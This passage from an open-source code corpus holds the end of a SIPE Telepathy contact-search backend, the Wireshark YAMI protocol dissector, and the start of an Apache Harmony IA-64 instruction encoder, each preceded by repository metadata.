static void free_info(GPtrArray *info)
{
g_boxed_free(TP_ARRAY_TYPE_CONTACT_INFO_FIELD_LIST, info);
}
struct sipe_backend_search_results *sipe_backend_search_results_start(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
struct sipe_backend_search_token *token)
{
SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(token);
self->results = g_hash_table_new_full(g_str_hash, g_str_equal,
g_free,
(GDestroyNotify) free_info);
return((struct sipe_backend_search_results *) self);
}
/* adds: the Contact_Info_Field (field_name, [], values) */
static void add_search_result(GPtrArray *info,
const gchar *field_name,
const gchar *field_value)
{
if (field_value) {
static const gchar **empty = { NULL };
GValueArray *field = g_value_array_new(3);
const gchar *components[] = { field_value, NULL };
GValue *value;
SIPE_DEBUG_INFO("add_search_result: %s = '%s'",
field_name, field_value);
g_value_array_append(field, NULL);
value = g_value_array_get_nth(field, 0);
g_value_init(value, G_TYPE_STRING);
g_value_set_static_string(value, field_name);
g_value_array_append(field, NULL);
value = g_value_array_get_nth(field, 1);
g_value_init(value, G_TYPE_STRV);
g_value_set_static_boxed(value, empty);
g_value_array_append(field, NULL);
value = g_value_array_get_nth(field, 2);
g_value_init(value, G_TYPE_STRV);
g_value_set_boxed(value, components);
g_ptr_array_add(info, field);
}
}
void sipe_backend_search_results_add(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
struct sipe_backend_search_results *results,
const gchar *uri,
const gchar *name,
const gchar *company,
const gchar *country,
const gchar *email)
{
SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(results);
GPtrArray *info = g_ptr_array_new();
add_search_result(info, SIPE_TELEPATHY_SEARCH_KEY_FULLNAME, name);
add_search_result(info, SIPE_TELEPATHY_SEARCH_KEY_COMPANY, company);
add_search_result(info, SIPE_TELEPATHY_SEARCH_KEY_COUNTRY, country);
add_search_result(info, SIPE_TELEPATHY_SEARCH_KEY_EMAIL, email);
g_hash_table_insert(self->results, g_strdup(uri), info);
}
void sipe_backend_search_results_finalize(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
struct sipe_backend_search_results *results,
SIPE_UNUSED_PARAMETER const gchar *description,
SIPE_UNUSED_PARAMETER gboolean more)
{
SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(results);
tp_svc_channel_type_contact_search_emit_search_result_received(self,
self->results);
search_channel_state(self,
TP_CHANNEL_CONTACT_SEARCH_STATE_COMPLETED,
NULL);
}
/*
Local Variables:
mode: c
c-file-style: "bsd"
indent-tabs-mode: t
tab-width: 8
End:
*/
| gpl-2.0 |
hashbrowncipher/wireshark | epan/dissectors/packet-yami.c | 2 | 19179 | /* packet-yami.c
* Routines for YAMI dissection
* Copyright 2010, Pawel Korbut
* Copyright 2012, Jakub Zawadzki <darkjames-ws@darkjames.pl>
*
* $Id$
*
* Protocol documentation available at http://www.inspirel.com/yami4/book/B-2.html
*
* Wireshark - Network traffic analyzer
* By Gerald Combs <gerald@wireshark.org>
* Copyright 1998 Gerald Combs
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#define NEW_PROTO_TREE_API
#include "config.h"
#include <epan/packet.h>
#include <epan/prefs.h>
#include <epan/strutil.h>
#include <epan/to_str.h>
#include <epan/dissectors/packet-tcp.h>
void proto_reg_handoff_yami(void);
void proto_register_yami(void);
static gboolean yami_desegment = TRUE;
static guint global_yami_config_tcp_port = 0;
static guint global_yami_config_udp_port = 0;
static dissector_handle_t yami_handle;
#define YAMI_TYPE_BOOLEAN 1
#define YAMI_TYPE_INTEGER 2
#define YAMI_TYPE_LONGLONG 3
#define YAMI_TYPE_DOUBLE 4
#define YAMI_TYPE_STRING 5
#define YAMI_TYPE_BINARY 6
#define YAMI_TYPE_BOOLEAN_ARRAY 7
#define YAMI_TYPE_INTEGER_ARRAY 8
#define YAMI_TYPE_LONGLONG_ARRAY 9
#define YAMI_TYPE_DOUBLE_ARRAY 10
#define YAMI_TYPE_STRING_ARRAY 11
#define YAMI_TYPE_BINARY_ARRAY 12
#define YAMI_TYPE_NESTED 13
static const value_string yami_param_type_vals[] = {
{ YAMI_TYPE_BOOLEAN, "boolean" },
{ YAMI_TYPE_INTEGER, "integer" },
{ YAMI_TYPE_LONGLONG, "long long" },
{ YAMI_TYPE_DOUBLE, "double" },
{ YAMI_TYPE_STRING, "string" },
{ YAMI_TYPE_BINARY, "binary" },
{ YAMI_TYPE_BOOLEAN_ARRAY, "boolean array" },
{ YAMI_TYPE_INTEGER_ARRAY, "integer array" },
{ YAMI_TYPE_LONGLONG_ARRAY, "long long array" },
{ YAMI_TYPE_DOUBLE_ARRAY, "double array" },
{ YAMI_TYPE_STRING_ARRAY, "string array" },
{ YAMI_TYPE_BINARY_ARRAY, "binary array" },
{ YAMI_TYPE_NESTED, "nested parameters" },
{ 0, NULL }
};
static header_field_info *hfi_yami = NULL;
#define YAMI_HFI_INIT HFI_INIT(proto_yami)
/* Header */
static header_field_info hfi_yami_message_id YAMI_HFI_INIT =
{ "Message ID", "yami.message_id", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };
static header_field_info hfi_yami_frame_number YAMI_HFI_INIT =
{ "Frame Number", "yami.frame_number", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };
static header_field_info hfi_yami_message_header_size YAMI_HFI_INIT =
{ "Message Header Size", "yami.message_header_size", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };
static header_field_info hfi_yami_frame_payload_size YAMI_HFI_INIT =
{ "Frame Payload Size", "yami.frame_payload_size", FT_INT32, BASE_DEC, NULL, 0x00, NULL, HFILL };
static header_field_info hfi_yami_message_hdr YAMI_HFI_INIT =
{ "Header message", "yami.msg_hdr", FT_NONE, BASE_NONE, NULL, 0x00, NULL, HFILL };
static header_field_info hfi_yami_message_data YAMI_HFI_INIT =
{ "Data message", "yami.msg_data", FT_NONE, BASE_NONE, NULL, 0x00, NULL, HFILL };
/* Parameter */
static header_field_info hfi_yami_param YAMI_HFI_INIT =
{ "Parameter", "yami.param", FT_NONE, BASE_NONE, NULL, 0x00, NULL, HFILL };
static header_field_info hfi_yami_param_name YAMI_HFI_INIT =
{ "Name", "yami.param.name", FT_STRING, BASE_NONE, NULL, 0x00, "Parameter name", HFILL };
static header_field_info hfi_yami_param_type YAMI_HFI_INIT =
{ "Type", "yami.param.type", FT_INT32, BASE_DEC, VALS(yami_param_type_vals), 0x00, "Parameter type", HFILL };
static header_field_info hfi_yami_param_value_bool YAMI_HFI_INIT =
{ "Value", "yami.param.value_bool", FT_BOOLEAN, BASE_NONE, NULL, 0x00, "Parameter value (bool)", HFILL };
static header_field_info hfi_yami_param_value_int YAMI_HFI_INIT =
{ "Value", "yami.param.value_int", FT_INT32, BASE_DEC, NULL, 0x00, "Parameter value (int)", HFILL };
static header_field_info hfi_yami_param_value_long YAMI_HFI_INIT =
{ "Value", "yami.param.value_long", FT_INT64, BASE_DEC, NULL, 0x00, "Parameter value (long)", HFILL };
static header_field_info hfi_yami_param_value_double YAMI_HFI_INIT =
{ "Value", "yami.param.value_double", FT_DOUBLE, BASE_NONE, NULL, 0x00, "Parameter value (double)", HFILL };
static header_field_info hfi_yami_param_value_str YAMI_HFI_INIT =
{ "Value", "yami.param.value_str", FT_STRING, BASE_NONE, NULL, 0x00, "Parameter value (string)", HFILL };
static header_field_info hfi_yami_param_value_bin YAMI_HFI_INIT =
{ "Value", "yami.param.value_bin", FT_BYTES, BASE_NONE, NULL, 0x00, "Parameter value (binary)", HFILL };
static header_field_info hfi_yami_params_count YAMI_HFI_INIT =
{ "Parameters count", "yami.params_count", FT_UINT32, BASE_DEC, NULL, 0x00, NULL, HFILL };
static header_field_info hfi_yami_items_count YAMI_HFI_INIT =
{ "Items count", "yami.items_count", FT_UINT32, BASE_DEC, NULL, 0x00, NULL, HFILL };
static int ett_yami = -1;
static int ett_yami_msg_hdr = -1;
static int ett_yami_msg_data = -1;
static int ett_yami_param = -1;
static int
dissect_yami_parameter(tvbuff_t *tvb, proto_tree *tree, int offset, proto_item *par_ti)
{
const int orig_offset = offset;
proto_tree *yami_param;
proto_item *ti;
char *name;
int name_offset;
guint32 name_len;
guint32 type;
ti = proto_tree_add_item(tree, &hfi_yami_param, tvb, offset, 0, ENC_NA);
yami_param = proto_item_add_subtree(ti, ett_yami_param);
name_offset = offset;
name_len = tvb_get_letohl(tvb, offset);
offset += 4;
name = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, name_len, ENC_ASCII | ENC_NA);
proto_item_append_text(ti, ": %s", name);
proto_item_append_text(par_ti, "%s, ", name);
offset += (name_len + 3) & ~3;
proto_tree_add_string(yami_param, &hfi_yami_param_name, tvb, name_offset, offset - name_offset, name);
type = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_param_type, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
switch (type) {
case YAMI_TYPE_BOOLEAN:
{
guint32 val = tvb_get_letohl(tvb, offset);
proto_item_append_text(ti, ", Type: boolean, Value: %s", val ? "True" : "False");
proto_tree_add_item(yami_param, &hfi_yami_param_value_bool, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
break;
}
case YAMI_TYPE_INTEGER:
{
gint32 val = tvb_get_letohl(tvb, offset);
proto_item_append_text(ti, ", Type: integer, Value: %d", val);
proto_tree_add_item(yami_param, &hfi_yami_param_value_int, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
break;
}
case YAMI_TYPE_LONGLONG:
{
gint64 val = tvb_get_letoh64(tvb, offset);
proto_item_append_text(ti, ", Type: long, Value: %" G_GINT64_MODIFIER "d", val);
proto_tree_add_item(yami_param, &hfi_yami_param_value_long, tvb, offset, 8, ENC_LITTLE_ENDIAN);
offset += 8;
break;
}
case YAMI_TYPE_DOUBLE:
{
gdouble val = tvb_get_letohieee_double(tvb, offset);
proto_item_append_text(ti, ", Type: double, Value: %g", val);
proto_tree_add_item(yami_param, &hfi_yami_param_value_double, tvb, offset, 8, ENC_LITTLE_ENDIAN);
offset += 8;
break;
}
case YAMI_TYPE_STRING:
{
const int val_offset = offset;
guint32 val_len;
char *val;
val_len = tvb_get_letohl(tvb, offset);
offset += 4;
val = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, val_len, ENC_ASCII | ENC_NA);
proto_item_append_text(ti, ", Type: string, Value: \"%s\"", val);
offset += (val_len + 3) & ~3;
proto_tree_add_string(yami_param, &hfi_yami_param_value_str, tvb, val_offset, offset - val_offset, val);
break;
}
case YAMI_TYPE_BINARY:
{
const int val_offset = offset;
guint32 val_len;
const guint8 *val;
char *repr;
val_len = tvb_get_letohl(tvb, offset);
offset += 4;
val = tvb_get_ptr(tvb, offset, val_len);
repr = bytes_to_ep_str(val, val_len);
proto_item_append_text(ti, ", Type: binary, Value: %s", repr);
offset += (val_len + 3) & ~3;
proto_tree_add_bytes_format_value(yami_param, hfi_yami_param_value_bin.id, tvb, val_offset, offset - val_offset, val, "%s", repr);
break;
}
case YAMI_TYPE_BOOLEAN_ARRAY:
{
guint32 count;
guint i;
int j;
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", Type: boolean[], %u items: {", count);
for (i = 0; i < count/32; i++) {
guint32 val = tvb_get_letohl(tvb, offset);
for (j = 0; j < 32; j++) {
int r = !!(val & (1 << j));
proto_item_append_text(ti, "%s, ", r ? "T" : "F");
proto_tree_add_boolean(yami_param, &hfi_yami_param_value_bool, tvb, offset+(j/8), 1, r);
}
offset += 4;
}
if (count % 32) {
guint32 val = tvb_get_letohl(tvb, offset);
int tmp = count % 32;
for (j = 0; j < tmp; j++) {
int r = !!(val & (1 << j));
proto_item_append_text(ti, "%s, ", r ? "T" : "F");
proto_tree_add_boolean(yami_param, &hfi_yami_param_value_bool, tvb, offset+(j/8), 1, r);
}
offset += 4;
}
proto_item_append_text(ti, "}");
break;
}
case YAMI_TYPE_INTEGER_ARRAY:
{
guint32 count;
guint i;
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", Type: integer[], %u items: {", count);
for (i = 0; i < count; i++) {
gint32 val = tvb_get_letohl(tvb, offset);
proto_item_append_text(ti, "%d, ", val);
proto_tree_add_item(yami_param, &hfi_yami_param_value_int, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
}
proto_item_append_text(ti, "}");
break;
}
case YAMI_TYPE_LONGLONG_ARRAY:
{
guint32 count;
guint i;
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", Type: long long[], %u items: {", count);
for (i = 0; i < count; i++) {
gint64 val = tvb_get_letoh64(tvb, offset);
proto_item_append_text(ti, "%" G_GINT64_MODIFIER "d, ", val);
proto_tree_add_item(yami_param, &hfi_yami_param_value_long, tvb, offset, 8, ENC_LITTLE_ENDIAN);
offset += 8;
}
proto_item_append_text(ti, "}");
break;
}
case YAMI_TYPE_DOUBLE_ARRAY:
{
guint32 count;
guint i;
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", Type: double[], %u items: {", count);
for (i = 0; i < count; i++) {
gdouble val = tvb_get_letohieee_double(tvb, offset);
proto_item_append_text(ti, "%g, ", val);
proto_tree_add_item(yami_param, &hfi_yami_param_value_double, tvb, offset, 8, ENC_LITTLE_ENDIAN);
offset += 8;
}
proto_item_append_text(ti, "}");
break;
}
case YAMI_TYPE_STRING_ARRAY:
{
guint32 count;
guint i;
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", Type: string[], %u items: {", count);
for (i = 0; i < count; i++) {
const int val_offset = offset;
guint32 val_len;
char *val;
val_len = tvb_get_letohl(tvb, offset);
offset += 4;
val = tvb_get_string_enc(wmem_packet_scope(), tvb, offset, val_len, ENC_ASCII | ENC_NA);
proto_item_append_text(ti, "\"%s\", ", val);
proto_tree_add_string(yami_param, &hfi_yami_param_value_str, tvb, val_offset, offset - val_offset, val);
offset += (val_len + 3) & ~3;
}
proto_item_append_text(ti, "}");
break;
}
case YAMI_TYPE_BINARY_ARRAY:
{
guint32 count;
guint i;
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_items_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", Type: binary[], %u items: {", count);
for (i = 0; i < count; i++) {
const int val_offset = offset;
guint32 val_len;
const guint8 *val;
char *repr;
val_len = tvb_get_letohl(tvb, offset);
offset += 4;
val = tvb_get_ptr(tvb, offset, val_len);
repr = bytes_to_ep_str(val, val_len);
proto_item_append_text(ti, "%s, ", repr);
offset += (val_len + 3) & ~3;
proto_tree_add_bytes_format_value(yami_param, hfi_yami_param_value_bin.id, tvb, val_offset, offset - val_offset, val, "%s", repr);
}
proto_item_append_text(ti, "}");
break;
}
case YAMI_TYPE_NESTED:
{
guint32 count;
guint i;
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_param, &hfi_yami_params_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", Type: nested, %u parameters: ", count);
for (i = 0; i < count; i++) {
offset = dissect_yami_parameter(tvb, yami_param, offset, ti);
/* smth went wrong */
if (offset == -1)
return -1;
}
break;
}
default:
proto_item_append_text(ti, ", Type: unknown (%d)!", type);
return -1;
}
proto_item_set_len(ti, offset - orig_offset);
return offset;
}
static int
dissect_yami_data(tvbuff_t *tvb, gboolean data, proto_tree *tree, int offset)
{
const int orig_offset = offset;
proto_tree *yami_data_tree;
proto_item *ti;
guint32 count;
guint i;
ti = proto_tree_add_item(tree, (data) ? &hfi_yami_message_data : &hfi_yami_message_hdr, tvb, offset, 0, ENC_NA);
yami_data_tree = proto_item_add_subtree(ti, (data) ? ett_yami_msg_data : ett_yami_msg_hdr);
count = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_data_tree, &hfi_yami_params_count, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
proto_item_append_text(ti, ", %u parameters: ", count);
for (i = 0; i < count; i++) {
offset = dissect_yami_parameter(tvb, yami_data_tree, offset, ti);
/* smth went wrong */
if (offset == -1)
return -1;
}
proto_item_set_len(ti, offset - orig_offset);
return offset;
}
static int
dissect_yami_pdu(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void* data _U_)
{
proto_tree *yami_tree;
proto_item *ti;
gint frame_number;
gint message_header_size;
gint frame_payload_size;
gint frame_size;
int offset;
col_set_str(pinfo->cinfo, COL_PROTOCOL, "YAMI");
col_clear(pinfo->cinfo, COL_INFO);
ti = proto_tree_add_item(tree, hfi_yami, tvb, 0, -1, ENC_NA);
yami_tree = proto_item_add_subtree(ti, ett_yami);
offset = 0;
proto_tree_add_item(yami_tree, &hfi_yami_message_id, tvb, offset, 4, ENC_LITTLE_ENDIAN);
offset += 4;
frame_number = tvb_get_letohl(tvb, offset);
ti = proto_tree_add_item(yami_tree, &hfi_yami_frame_number, tvb, offset, 4, ENC_LITTLE_ENDIAN);
if(frame_number < 0)
proto_item_append_text(ti, "%s", " (last frame)");
offset += 4;
message_header_size = tvb_get_letohl(tvb, offset);
proto_tree_add_item(yami_tree, &hfi_yami_message_header_size, tvb, offset, 4, ENC_LITTLE_ENDIAN);
if (message_header_size < 4) {
/* XXX, expert info */
}
offset += 4;
frame_payload_size = tvb_get_letohl(tvb, offset);
ti = proto_tree_add_item(yami_tree, &hfi_yami_frame_payload_size, tvb, offset, 4, ENC_LITTLE_ENDIAN);
frame_size = frame_payload_size + 16;
proto_item_append_text(ti, ", (YAMI Frame Size: %d)", frame_size);
offset += 4;
if (frame_number == 1 || frame_number == -1) {
if (message_header_size <= frame_payload_size) {
const int orig_offset = offset;
offset = dissect_yami_data(tvb, FALSE, yami_tree, offset);
if (offset != orig_offset + message_header_size) {
/* XXX, expert info */
offset = orig_offset + message_header_size;
}
dissect_yami_data(tvb, TRUE, yami_tree, offset);
}
}
return tvb_length(tvb);
}
#define FRAME_HEADER_LEN 16
static guint
get_yami_message_len(packet_info *pinfo _U_, tvbuff_t *tvb, int offset)
{
guint32 len = tvb_get_letohl(tvb, offset + 12);
return len + FRAME_HEADER_LEN;
}
static int
dissect_yami(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree, void *data)
{
tcp_dissect_pdus(tvb, pinfo, tree, yami_desegment, FRAME_HEADER_LEN, get_yami_message_len, dissect_yami_pdu, data);
return tvb_length(tvb);
}
void
proto_register_yami(void)
{
#ifndef HAVE_HFI_SECTION_INIT
static header_field_info *hfi[] = {
/* Header */
&hfi_yami_message_id,
&hfi_yami_frame_number,
&hfi_yami_message_header_size,
&hfi_yami_frame_payload_size,
&hfi_yami_message_hdr,
&hfi_yami_message_data,
/* Parameter */
&hfi_yami_param,
&hfi_yami_param_name,
&hfi_yami_param_type,
&hfi_yami_param_value_bool,
&hfi_yami_param_value_int,
&hfi_yami_param_value_long,
&hfi_yami_param_value_double,
&hfi_yami_param_value_str,
&hfi_yami_param_value_bin,
&hfi_yami_params_count,
&hfi_yami_items_count,
};
#endif
static gint *ett[] = {
&ett_yami,
&ett_yami_msg_hdr,
&ett_yami_msg_data,
&ett_yami_param
};
module_t *yami_module;
int proto_yami;
proto_yami = proto_register_protocol("YAMI Protocol", "YAMI", "yami");
hfi_yami = proto_registrar_get_nth(proto_yami);
proto_register_fields(proto_yami, hfi, array_length(hfi));
proto_register_subtree_array(ett, array_length(ett));
yami_module = prefs_register_protocol(proto_yami, proto_reg_handoff_yami);
prefs_register_uint_preference(yami_module, "tcp.port", "YAMI TCP Port", "The TCP port on which YAMI messages will be read(3000)", 10, &global_yami_config_tcp_port);
prefs_register_uint_preference(yami_module, "udp.port", "YAMI UDP Port", "The UDP port on which YAMI messages will be read(5000)", 10, &global_yami_config_udp_port);
prefs_register_bool_preference(yami_module, "desegment",
"Reassemble YAMI messages spanning multiple TCP segments",
"Whether the YAMI dissector should reassemble messages spanning multiple TCP segments."
"To use this option, you must also enable \"Allow subdissectors to reassemble TCP streams\" in the TCP protocol settings.",
&yami_desegment);
yami_handle = new_create_dissector_handle(dissect_yami, proto_yami);
}
void
proto_reg_handoff_yami(void)
{
static int yami_prefs_initialized = FALSE;
static guint yami_tcp_port, yami_udp_port;
if(yami_prefs_initialized == FALSE){
yami_prefs_initialized = TRUE;
yami_tcp_port = global_yami_config_tcp_port;
yami_udp_port = global_yami_config_udp_port;
}else{
dissector_delete_uint("tcp.port", yami_tcp_port, yami_handle);
dissector_delete_uint("udp.port", yami_udp_port, yami_handle);
}
yami_tcp_port = global_yami_config_tcp_port;
yami_udp_port = global_yami_config_udp_port;
dissector_add_uint("tcp.port", yami_tcp_port, yami_handle);
dissector_add_uint("udp.port", yami_udp_port, yami_handle);
}
| gpl-2.0 |
skyHALud/codenameone | Ports/iOSPort/xmlvm/apache-harmony-6.0-src-r991881/drlvm/vm/vmcore/src/util/ipf/code_emit/merced.cpp | 2 | 54485 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @author Intel, Evgueni Brevnov
*/
//
// $Header: /cvs/drl/mrt/vm/vmcore/src/util/ipf/code_emit/merced.cpp,v 1.1.2.1.4.3 2006/03/28 15:08:51 aycherny Exp $
//
#include "open/types.h"
#include "merced.h"
// 20021204 Arrays tmplt_descr and IpfTemplInfo::info are a little
// different and they should be eventually merged.
Template_Descr tmplt_descr[] = {
{{ST_m, ST_i, ST_i}, 3, 0},
{{ST_m, ST_i, ST_i}, 2, 2},
{{ST_m, ST_il, ST_null}, 3, 0},
{{ST_null, ST_null, ST_null}, 3, 0},
{{ST_m, ST_m, ST_i}, 3, 0},
{{ST_m, ST_m, ST_i}, 1, 1},
{{ST_m, ST_f, ST_i}, 3, 0},
{{ST_m, ST_m, ST_f}, 3, 0},
{{ST_m, ST_i, ST_b}, 3, 0},
{{ST_m, ST_b, ST_b}, 3, 0},
{{ST_null, ST_null, ST_null}, 3, 0},
{{ST_b, ST_b, ST_b}, 3, 0},
{{ST_m, ST_m, ST_b}, 3, 0},
{{ST_null, ST_null, ST_null}, 3, 0},
{{ST_m, ST_f, ST_b}, 3, 0},
{{ST_null, ST_null, ST_null}, 3, 0}
};
IpfTemplInfo::TemplDesc IpfTemplInfo::info[] = {
{{ST_m, ST_i, ST_i}, ".mii"},
{{ST_m, ST_i, ST_i}, ".mi;i"},
{{ST_m, ST_il, ST_null}, ".mxi"},
{{ST_null, ST_null, ST_null}, "bad1"},
{{ST_m, ST_m, ST_i}, ".mmi"},
{{ST_m, ST_m, ST_i}, ".m;mi"},
{{ST_m, ST_f, ST_i}, ".mfi"},
{{ST_m, ST_m, ST_f}, ".mmf"},
{{ST_m, ST_i, ST_b}, ".mib"},
{{ST_m, ST_b, ST_b}, ".mbb"},
{{ST_null, ST_null, ST_null}, ".bad2"},
{{ST_b, ST_b, ST_b}, ".bbb"},
{{ST_m, ST_m, ST_b}, ".mmb"},
{{ST_null, ST_null, ST_null}, ".bad3"},
{{ST_m, ST_f, ST_b}, ".mfb"},
{{ST_null, ST_null, ST_null}, ".bad4"}
};
void Encoder_128::slot_reset(int slot_num, int offset, int bit_length) {
switch (slot_num)
{
case 0:
if (5+offset+bit_length-1 > 45) { assert(0); }
_reset_32(5 + offset + bit_length - 1, 5 + offset);
break;
case 1:
if (46+offset+bit_length-1 > 86) { assert(0); }
_reset_32(46 + offset + bit_length - 1, 46 + offset);
break;
case 2:
if (87+offset+bit_length-1 > 127) { assert(0); }
_reset_32(87 + offset + bit_length - 1, 87 + offset);
break;
}
}
void Encoder_128::_reset_32(unsigned left, unsigned right) {
// make sure caller checks that left >= right
unsigned stop_byte = left >> 3;
unsigned stop_bit = left & 0x7;
unsigned current_byte = right >> 3;
unsigned current_bit = right & 0x7;
// do from right to left
int bit_length, pos = 0;
unsigned mask_bits;
while (current_byte <= stop_byte)
{
bit_length = (current_byte==stop_byte) ? (stop_bit+1 - current_bit) : (8 - current_bit);
mask_bits = ((1 << bit_length) - 1);
// encode
_char_value[current_byte] &= ~(mask_bits << current_bit);
// update
if (pos==0) current_bit = 0;
pos += bit_length;
current_byte++;
}
}
unsigned Opcode_Encoder_offset9::A1_A2_A3_A4(unsigned opcode, unsigned x2a, unsigned ve, unsigned x4, unsigned x2b)
{
encode(opcode, 40, 37);
encode(x2a, 35, 34);
encode(ve, 33, 33);
encode(x4, 32, 29);
encode(x2b, 28, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::A5_I15(unsigned opcode)
{
encode(opcode, 40, 37);
return emit();
}
unsigned Opcode_Encoder_offset9::A6_A7(unsigned opcode, unsigned tb, unsigned x2, unsigned ta, unsigned c)
{
encode(opcode, 40, 37);
encode(tb, 36, 36);
encode(x2, 35, 34);
encode(ta, 33, 33);
encode(c, 12, 12);
return emit();
}
unsigned Opcode_Encoder_offset9::A8(unsigned opcode, unsigned x2, unsigned ta, unsigned c)
{
encode(opcode, 40, 37);
encode(x2, 35, 34);
encode(ta, 33, 33);
encode(c, 12, 12);
return emit();
}
unsigned Opcode_Encoder_offset9::I5_I7(unsigned opcode, unsigned za, unsigned x2a, unsigned zb, unsigned ve, unsigned x2c, unsigned x2b)
{
encode(opcode, 40, 37);
encode(za, 36, 36);
encode(x2a, 35, 34);
encode(zb, 33, 33);
encode(ve, 32, 32);
encode(x2c, 31, 30);
encode(x2b, 29, 28);
return emit();
}
unsigned Opcode_Encoder_offset9::I10_I11(unsigned opcode, unsigned x2, unsigned x, unsigned y)
{
encode(opcode, 40, 37);
encode(x2, 35, 34);
encode(x, 33, 33);
encode(y, 13, 13);
return emit();
}
unsigned Opcode_Encoder_offset9::I12_I13_I14(unsigned opcode, unsigned x2, unsigned x, unsigned y)
{
encode(opcode, 40, 37);
encode(x2, 35, 34);
encode(x, 33, 33);
encode(y, 26, 26);
return emit();
}
unsigned Opcode_Encoder_offset9::I18(unsigned opcode, unsigned vc)
{
encode(opcode, 40, 37);
encode(vc, 20, 20);
return emit();
}
unsigned Opcode_Encoder_offset9::I19_I22_I25_I26_I27_I28_I29_M29_M31(unsigned opcode, unsigned x3, unsigned x6)
{
encode(opcode, 40, 37);
encode(x3, 35, 33);
encode(x6, 32, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::I21(unsigned opcode, unsigned x3, unsigned ih, unsigned x, unsigned wh, unsigned p, unsigned pbtv)
{
encode(opcode, 40, 37);
encode(x3, 35, 33);
encode(ih, 23, 23);
encode(x, 22, 22);
encode(wh, 21, 20);
encode(p, 12, 12);
encode(pbtv, 11, 9);
return emit();
}
unsigned Opcode_Encoder_offset9::I20_I23_I24_M20_M21(unsigned opcode, unsigned x3)
{
encode(opcode, 40, 37);
encode(x3, 35, 33);
return emit();
}
unsigned Opcode_Encoder_offset9::I25(unsigned opcode, unsigned x3, unsigned x6)
{
encode(opcode, 40, 37);
encode(x3, 35, 33);
encode(x6, 32, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::B1_B2_B3_B4_B5(unsigned opcode, unsigned d, unsigned wh, unsigned p, unsigned x6)
{
encode(opcode, 40, 37);
encode(d, 35, 35);
encode(wh, 34, 33);
encode(p, 12, 12);
encode(x6, 32, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::B8_B9(unsigned opcode, unsigned x6)
{
encode(opcode, 40, 37);
encode(x6, 32, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::M24_M25_M26_M27_M37(unsigned opcode, unsigned x3, unsigned x4, unsigned x2)
{
encode(opcode, 40, 37);
encode(x3, 35, 33);
encode(x2, 32, 31);
encode(x4, 30, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::M24_M25_M26_M37(unsigned opcode, unsigned x3, unsigned x4, unsigned x2)
{
encode(opcode, 40, 37);
encode(x3, 35, 33);
encode(x2, 32, 31);
encode(x4, 30, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::F15(unsigned opcode, unsigned x, unsigned x6)
{
encode(opcode, 40, 37);
encode(x, 33, 33);
encode(x6, 32, 27);
return emit();
}
unsigned Opcode_Encoder_offset9::M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(unsigned opcode, unsigned x6, unsigned hint, unsigned x, unsigned m)
{
encode(opcode, 40, 37);
encode(m, 36, 36);
